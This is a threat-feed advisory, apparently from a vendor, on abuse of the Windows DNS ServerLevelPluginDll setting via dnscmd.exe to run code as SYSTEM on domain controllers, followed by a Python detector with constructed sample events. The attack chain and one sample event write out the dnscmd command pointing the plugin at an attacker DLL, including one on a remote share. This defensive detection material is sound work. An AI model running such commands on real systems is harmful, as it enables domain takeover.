{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/windows-server/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud","Windows Server"],"_cs_severities":["high"],"_cs_tags":["persistence","privilege-escalation","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Splunk"],"content_html":"\u003cp\u003eThe Microsoft DNS Server ServerLevelPluginDll setting tells the DNS service to load a DLL from an administrator-supplied path when the service starts. An attacker holding DNS administrative rights (for example, membership in the DnsAdmins group) can use \u003ccode\u003ednscmd.exe\u003c/code\u003e to point this setting at a DLL they control, and the DNS service loads it the next time it starts. This gives the attacker code execution in the security context of the DNS service, which runs as LocalSystem; on a domain controller that means SYSTEM on a DC, so the technique can be used for persistence, privilege escalation, and domain compromise. The technique has been publicly documented and observed in use. Defenders should monitor for modifications to the ServerLevelPluginDll setting, whether made through \u003ccode\u003ednscmd.exe\u003c/code\u003e or by writing the underlying registry value directly, to detect this abuse.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access, for example through an existing compromise or by exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges to obtain DNS administrative rights.\u003c/li\u003e\n\u003cli\u003eThe attacker runs \u003ccode\u003ednscmd.exe \u0026lt;server\u0026gt; /config /serverlevelplugindll \u0026lt;path-to-dll\u0026gt;\u003c/code\u003e, which writes the DLL path to the \u003ccode\u003eServerLevelPluginDll\u003c/code\u003e value under \u003ccode\u003eHKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\DNS\\\\Parameters\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe DNS service reads the setting at startup and loads the attacker-controlled DLL when it is next restarted or the server reboots.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL executes arbitrary code within the context of the DNS service.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence because the DLL is loaded again on every DNS service start until the setting is removed.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the SYSTEM-level privileges of the DNS service (on a domain controller, the DC itself) for lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code within the highly privileged context of the Windows DNS Server service. Because the DNS Server role is most often installed on domain controllers, this can lead to complete domain compromise and control of critical network infrastructure. The impact ranges from data theft and service disruption to complete takeover of the Active Directory environment. Any organization running Windows DNS Server is potentially affected.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process execution for \u003ccode\u003ednscmd.exe\u003c/code\u003e with command-line arguments containing \u003ccode\u003e/config\u003c/code\u003e and \u003ccode\u003e/serverlevelplugindll\u003c/code\u003e using the Sigma rule provided in this brief.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 and Windows Security Event ID 4688 to capture process creation events, and turn on command-line auditing (the \"Include command line in process creation events\" policy), since 4688 does not record the arguments without it and the detection keys on them.\u003c/li\u003e\n\u003cli\u003eAlso monitor writes to the \u003ccode\u003eServerLevelPluginDll\u003c/code\u003e registry value (for example with Sysmon Event ID 13), since an attacker can set it with \u003ccode\u003ereg.exe\u003c/code\u003e or PowerShell without ever running \u003ccode\u003ednscmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any instance of \u003ccode\u003ednscmd.exe\u003c/code\u003e modifying the ServerLevelPluginDll setting, and audit the current value on each DNS server with \u003ccode\u003ereg query HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\DNS\\\\Parameters /v ServerLevelPluginDll\u003c/code\u003e; on a server that uses no plugin the value should be absent or empty.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls to limit who can administer the DNS service; in particular, review membership of the DnsAdmins group and treat it as equivalent to domain controller administration.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-dnscmd-serverlevelplugin/","summary":"Attackers can use dnscmd.exe with administrative privileges to configure the Microsoft DNS ServerLevelPluginDll setting, allowing them to load arbitrary DLLs and execute code within the DNS service context for persistence and privilege escalation.","title":"Abuse of dnscmd.exe to Modify DNS ServerLevelPluginDLL","url":"https://feed.craftedsignal.io/briefs/2024-01-dnscmd-serverlevelplugin/"}],"language":"en","title":"CraftedSignal Threat Feed — Windows Server","version":"https://jsonfeed.org/version/1.1"}
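The detection logic that the attack chain and recommendation sections of the brief above describe, as an added example that is not part of the CraftedSignal feed item or its Sigma rule. It assumes events have already been parsed into dictionaries keyed by the field names Sysmon and the Windows Security log emit (Image, CommandLine, TargetObject, Details, NewProcessName, SubjectUserName); the sample events, the DC01 host, the user names, the DLL paths and the two rule names are constructed for the demo. Besides the dnscmd.exe command-line pattern, it flags a direct write to the ServerLevelPluginDll registry value (Sysmon Event ID 13), which a dnscmd-only rule would miss, and notes when the DLL path is a UNC share.

```python
"""Flag ServerLevelPluginDll tampering in Windows process-creation and registry events.

Added example, not the brief's own Sigma rule. Two signals are covered:
  * dnscmd.exe run with /config and /serverlevelplugindll (Sysmon EID 1 or Security 4688)
  * a direct write to the ServerLevelPluginDll registry value (Sysmon EID 13)
Events are plain dicts using the field names Sysmon and the Security log emit. The sample
events, host, user names, DLL paths and rule names below are constructed for the demo.
"""
import re
from typing import Optional

# Registry value written by "dnscmd /config /serverlevelplugindll" (matched case-insensitively).
PLUGIN_VALUE_SUFFIX = r"\services\dns\parameters\serverlevelplugindll"


def split_cmdline(cmdline: str) -> list:
    """Split a Windows command line into arguments, keeping quoted paths together."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def check_process_event(ev: dict) -> Optional[dict]:
    """Match a Sysmon EID 1 or Security 4688 event for the dnscmd.exe pattern."""
    image = ev.get("Image") or ev.get("NewProcessName") or ""
    if image.rsplit("\\", 1)[-1].lower() != "dnscmd.exe":
        return None
    args = split_cmdline(ev.get("CommandLine", ""))
    lowered = [a.lower() for a in args]
    if "/config" not in lowered or "/serverlevelplugindll" not in lowered:
        return None
    idx = lowered.index("/serverlevelplugindll")
    dll = args[idx + 1] if idx + 1 < len(args) else ""  # empty when the value is being cleared
    return {
        "rule": "dnscmd_serverlevelplugindll_set",
        "user": ev.get("User") or ev.get("SubjectUserName", ""),
        "image": image,
        "dll": dll,
        "remote_dll": dll.startswith("\\\\"),  # UNC path: DLL fetched from another host
    }


def check_registry_event(ev: dict) -> Optional[dict]:
    """Match a Sysmon EID 13 (RegistryEvent, value set) on the plugin value."""
    target = ev.get("TargetObject", "")
    if not target.lower().endswith(PLUGIN_VALUE_SUFFIX):
        return None
    dll = ev.get("Details", "")
    return {
        "rule": "registry_serverlevelplugindll_set",
        "user": ev.get("User", ""),
        "image": ev.get("Image", ""),
        "dll": dll,
        "remote_dll": dll.startswith("\\\\"),
    }


def scan(events) -> list:
    """Run both checks over an iterable of events and return the alerts in order."""
    alerts = []
    for ev in events:
        hit = None
        if ev.get("event_id") in (1, 4688):
            hit = check_process_event(ev)
        elif ev.get("event_id") == 13:
            hit = check_registry_event(ev)
        if hit:
            hit["host"] = ev.get("Computer", "")
            alerts.append(hit)
    return alerts


# Constructed sample events (not real telemetry): one DC, two benign dnscmd runs, one attacker.
SAMPLE_EVENTS = [
    # Sysmon EID 1: an operator queries server settings; must not alert
    {"event_id": 1, "Computer": "DC01", "User": "CORP\\dnsops",
     "Image": r"C:\Windows\System32\dnscmd.exe",
     "CommandLine": r"dnscmd.exe DC01 /info"},
    # Security 4688 with command-line auditing on: the plugin is pointed at a UNC share
    {"event_id": 4688, "Computer": "DC01", "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\dnscmd.exe",
     "CommandLine": r"dnscmd.exe DC01 /config /serverlevelplugindll \\10.0.0.5\share\plugin.dll"},
    # Sysmon EID 13: the same value written with reg.exe, never touching dnscmd.exe
    {"event_id": 13, "Computer": "DC01", "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll",
     "Details": r"C:\Windows\Temp\plugin.dll"},
    # Sysmon EID 1: unrelated zone administration; must not alert
    {"event_id": 1, "Computer": "DC01", "User": "CORP\\dnsops",
     "Image": r"C:\Windows\System32\dnscmd.exe",
     "CommandLine": r"dnscmd.exe DC01 /zoneadd corp.local /dsprimary"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['rule']}] host={a['host']} user={a['user']} dll={a['dll']} remote={a['remote_dll']}")
```

Running the script prints two alerts for the constructed input, one from the 4688 event and one from the registry write, and nothing for the two benign dnscmd.exe runs. The registry check is the one to keep even if the dnscmd.exe rule is tuned down: it catches the same change regardless of which tool made it, and it fires on the value that the DNS service actually reads at its next start.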